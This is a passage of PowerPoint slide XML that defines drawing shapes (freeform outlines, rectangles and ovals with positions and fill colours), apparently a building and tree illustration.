                <a:solidFill>
                  <a:srgbClr val="008A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4" name="Freeform 37"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7823589" y="5725160"/>
                  <a:ext cx="1160765" cy="976265"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 522 w 950"/>
                    <a:gd name="T1" fmla="*/ 135 h 799"/>
                    <a:gd name="T2" fmla="*/ 522 w 950"/>
                    <a:gd name="T3" fmla="*/ 0 h 799"/>
                    <a:gd name="T4" fmla="*/ 626 w 950"/>
                    <a:gd name="T5" fmla="*/ 0 h 799"/>
                    <a:gd name="T6" fmla="*/ 626 w 950"/>
                    <a:gd name="T7" fmla="*/ 135 h 799"/>
                    <a:gd name="T8" fmla="*/ 662 w 950"/>
                    <a:gd name="T9" fmla="*/ 135 h 799"/>
                    <a:gd name="T10" fmla="*/ 662 w 950"/>
                    <a:gd name="T11" fmla="*/ 0 h 799"/>
                    <a:gd name="T12" fmla="*/ 766 w 950"/>
                    <a:gd name="T13" fmla="*/ 0 h 799"/>
                    <a:gd name="T14" fmla="*/ 766 w 950"/>
                    <a:gd name="T15" fmla="*/ 135 h 799"/>
                    <a:gd name="T16" fmla="*/ 950 w 950"/>
                    <a:gd name="T17" fmla="*/ 135 h 799"/>
                    <a:gd name="T18" fmla="*/ 950 w 950"/>
                    <a:gd name="T19" fmla="*/ 168 h 799"/>
                    <a:gd name="T20" fmla="*/ 908 w 950"/>
                    <a:gd name="T21" fmla="*/ 168 h 799"/>
                    <a:gd name="T22" fmla="*/ 908 w 950"/>
                    <a:gd name="T23" fmla="*/ 799 h 799"/>
                    <a:gd name="T24" fmla="*/ 43 w 950"/>
                    <a:gd name="T25" fmla="*/ 799 h 799"/>
                    <a:gd name="T26" fmla="*/ 43 w 950"/>
                    <a:gd name="T27" fmla="*/ 168 h 799"/>
                    <a:gd name="T28" fmla="*/ 0 w 950"/>
                    <a:gd name="T29" fmla="*/ 168 h 799"/>
                    <a:gd name="T30" fmla="*/ 0 w 950"/>
                    <a:gd name="T31" fmla="*/ 135 h 799"/>
                    <a:gd name="T32" fmla="*/ 522 w 950"/>
                    <a:gd name="T33" fmla="*/ 1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0" h="799">
                      <a:moveTo>
                        <a:pt x="522" y="135"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="522" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="626" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="626" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="662" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="662" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="766" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="766" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="950" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="950" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="908" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="908" y="799"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43" y="799"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="522" y="135"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:cu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5" name="Freeform 38"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7208994" y="5725160"/>
                  <a:ext cx="1163209" cy="976265"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 525 w 952"/>
                    <a:gd name="T1" fmla="*/ 135 h 799"/>
                    <a:gd name="T2" fmla="*/ 525 w 952"/>
                    <a:gd name="T3" fmla="*/ 0 h 799"/>
                    <a:gd name="T4" fmla="*/ 629 w 952"/>
                    <a:gd name="T5" fmla="*/ 0 h 799"/>
                    <a:gd name="T6" fmla="*/ 629 w 952"/>
                    <a:gd name="T7" fmla="*/ 135 h 799"/>
                    <a:gd name="T8" fmla="*/ 664 w 952"/>
                    <a:gd name="T9" fmla="*/ 135 h 799"/>
                    <a:gd name="T10" fmla="*/ 664 w 952"/>
                    <a:gd name="T11" fmla="*/ 0 h 799"/>
                    <a:gd name="T12" fmla="*/ 766 w 952"/>
                    <a:gd name="T13" fmla="*/ 0 h 799"/>
                    <a:gd name="T14" fmla="*/ 766 w 952"/>
                    <a:gd name="T15" fmla="*/ 135 h 799"/>
                    <a:gd name="T16" fmla="*/ 952 w 952"/>
                    <a:gd name="T17" fmla="*/ 135 h 799"/>
                    <a:gd name="T18" fmla="*/ 952 w 952"/>
                    <a:gd name="T19" fmla="*/ 168 h 799"/>
                    <a:gd name="T20" fmla="*/ 910 w 952"/>
                    <a:gd name="T21" fmla="*/ 168 h 799"/>
                    <a:gd name="T22" fmla="*/ 910 w 952"/>
                    <a:gd name="T23" fmla="*/ 799 h 799"/>
                    <a:gd name="T24" fmla="*/ 43 w 952"/>
                    <a:gd name="T25" fmla="*/ 799 h 799"/>
                    <a:gd name="T26" fmla="*/ 43 w 952"/>
                    <a:gd name="T27" fmla="*/ 168 h 799"/>
                    <a:gd name="T28" fmla="*/ 0 w 952"/>
                    <a:gd name="T29" fmla="*/ 168 h 799"/>
                    <a:gd name="T30" fmla="*/ 0 w 952"/>
                    <a:gd name="T31" fmla="*/ 135 h 799"/>
                    <a:gd name="T32" fmla="*/ 525 w 952"/>
                    <a:gd name="T33" fmla="*/ 1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2" h="799">
                      <a:moveTo>
                        <a:pt x="525" y="135"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="525" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="629" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="629" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="664" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="664" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="766" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="766" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="952" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="952" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="910" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="910" y="799"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43" y="799"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="135"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="135"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:cu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6" name="Rectangle 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8670336" y="5381818"/>
                  <a:ext cx="1058129" cy="1319606"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">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7" name="Rectangle 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8617797" y="5341497"/>
                  <a:ext cx="1163209" cy="40322"/>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8" name="Rectangle 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9253163" y="6435059"/>
                  <a:ext cx="138070" cy="26636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29" name="Rectangle 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9013678" y="6435059"/>
                  <a:ext cx="138070" cy="26636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0" name="Rectangle 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8776638" y="5500338"/>
                  <a:ext cx="854078" cy="13807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1" name="Rectangle 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8776638" y="5737379"/>
                  <a:ext cx="854078" cy="13807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2" name="Rectangle 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8776638" y="5976863"/>
                  <a:ext cx="854078" cy="13562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3" name="Rectangle 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8776638" y="6212681"/>
                  <a:ext cx="854078" cy="135627"/>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4" name="Rectangle 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9728465" y="6634222"/>
                  <a:ext cx="2531689" cy="67203"/>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5" name="Rectangle 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8842618" y="5176546"/>
                  <a:ext cx="410544" cy="164951"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="0072C6">
                    <a:lumMod val="7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6" name="Rectangle 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7380053" y="3500156"/>
                  <a:ext cx="1055684" cy="320126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7" name="Rectangle 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7959215" y="6435059"/>
                  <a:ext cx="139292" cy="26636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8" name="Rectangle 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7723397" y="6435059"/>
                  <a:ext cx="135626" cy="26636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39" name="Rectangle 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5500338"/>
                  <a:ext cx="854078" cy="13807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0" name="Rectangle 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5737379"/>
                  <a:ext cx="854078" cy="13807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1" name="Rectangle 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5976863"/>
                  <a:ext cx="854078" cy="13562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2" name="Rectangle 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="6212681"/>
                  <a:ext cx="854078" cy="13562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3" name="Rectangle 57"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5027479"/>
                  <a:ext cx="854078" cy="13562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4" name="Rectangle 58"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="5263298"/>
                  <a:ext cx="854078" cy="13562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5" name="Rectangle 59"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="4313914"/>
                  <a:ext cx="854078" cy="13807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6" name="Rectangle 60"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="4553398"/>
                  <a:ext cx="854078" cy="13562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7" name="Rectangle 61"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="4790439"/>
                  <a:ext cx="854078" cy="13807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8" name="Rectangle 62"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="3841055"/>
                  <a:ext cx="854078" cy="13562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49" name="Rectangle 63"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="4076874"/>
                  <a:ext cx="854078" cy="13929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0" name="Rectangle 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7483913" y="3597905"/>
                  <a:ext cx="854078" cy="13562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1" name="Rectangle 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5420195" y="4447097"/>
                  <a:ext cx="1059350" cy="2254328"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="00B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2" name="Rectangle 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6003021" y="6435059"/>
                  <a:ext cx="135626" cy="266365"/>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3" name="Rectangle 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5763537" y="6435059"/>
                  <a:ext cx="138070" cy="266365"/>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4" name="Rectangle 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5500338"/>
                  <a:ext cx="854078" cy="138070"/>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5" name="Rectangle 69"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5737379"/>
                  <a:ext cx="854078" cy="138070"/>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6" name="Rectangle 70"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5976863"/>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7" name="Rectangle 71"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="6212681"/>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8" name="Rectangle 72"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5027479"/>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59" name="Rectangle 73"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="5263298"/>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0" name="Rectangle 74"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="4553398"/>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1" name="Rectangle 75"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5524053" y="4790439"/>
                  <a:ext cx="854078" cy="138070"/>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2" name="Rectangle 76"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8322861" y="6634222"/>
                  <a:ext cx="398325" cy="67204"/>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3" name="Rectangle 77"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6479546" y="6634222"/>
                  <a:ext cx="1142437" cy="67203"/>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4" name="Rectangle 79"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5318780" y="5044584"/>
                  <a:ext cx="101414" cy="1654198"/>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5" name="Freeform 84"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4592805" y="6455831"/>
                  <a:ext cx="48873" cy="184501"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 40"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 0 h 151"/>
                    <a:gd name="T4" fmla="*/ 40 w 40"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 151 h 151"/>
                    <a:gd name="T8" fmla="*/ 0 w 40"/>
                    <a:gd name="T9" fmla="*/ 0 h 151"/>
                    <a:gd name="T10" fmla="*/ 0 w 40"/>
                    <a:gd name="T11" fmla="*/ 0 h 151"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40" h="151">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>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6" name="Oval 85"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4479167" y="6290880"/>
                  <a:ext cx="248037" cy="24559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7" name="Oval 86"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4514602" y="6163807"/>
                  <a:ext cx="180835" cy="18205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8" name="Freeform 87"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4763048" y="6510814"/>
                  <a:ext cx="35434" cy="129518"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 29"/>
                    <a:gd name="T1" fmla="*/ 0 h 106"/>
                    <a:gd name="T2" fmla="*/ 29 w 29"/>
                    <a:gd name="T3" fmla="*/ 0 h 106"/>
                    <a:gd name="T4" fmla="*/ 29 w 29"/>
                    <a:gd name="T5" fmla="*/ 106 h 106"/>
                    <a:gd name="T6" fmla="*/ 0 w 29"/>
                    <a:gd name="T7" fmla="*/ 106 h 106"/>
                    <a:gd name="T8" fmla="*/ 0 w 29"/>
                    <a:gd name="T9" fmla="*/ 0 h 106"/>
                    <a:gd name="T10" fmla="*/ 0 w 29"/>
                    <a:gd name="T11" fmla="*/ 0 h 106"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="29" h="106">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="29" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="106"/>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69" name="Oval 88"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4694624" y="6394738"/>
                  <a:ext cx="169838" cy="17350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0" name="Oval 89"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4717839" y="6307986"/>
                  <a:ext cx="123407" cy="12707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1" name="Freeform 90"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11310771" y="6464384"/>
                  <a:ext cx="48874" cy="184501"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 40"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 0 h 151"/>
                    <a:gd name="T4" fmla="*/ 40 w 40"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 151 h 151"/>
                    <a:gd name="T8" fmla="*/ 0 w 40"/>
                    <a:gd name="T9" fmla="*/ 0 h 151"/>
                    <a:gd name="T10" fmla="*/ 0 w 40"/>
                    <a:gd name="T11" fmla="*/ 0 h 151"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40" h="151">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>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2" name="Freeform 96"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11795848" y="6464384"/>
                  <a:ext cx="48874" cy="184501"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 40"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 0 h 151"/>
                    <a:gd name="T4" fmla="*/ 40 w 40"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 151 h 151"/>
                    <a:gd name="T8" fmla="*/ 0 w 40"/>
                    <a:gd name="T9" fmla="*/ 0 h 151"/>
                    <a:gd name="T10" fmla="*/ 0 w 40"/>
                    <a:gd name="T11" fmla="*/ 0 h 151"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40" h="151">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>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3" name="Oval 97"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11694434" y="6299433"/>
                  <a:ext cx="248037" cy="24559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4" name="Freeform 99"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
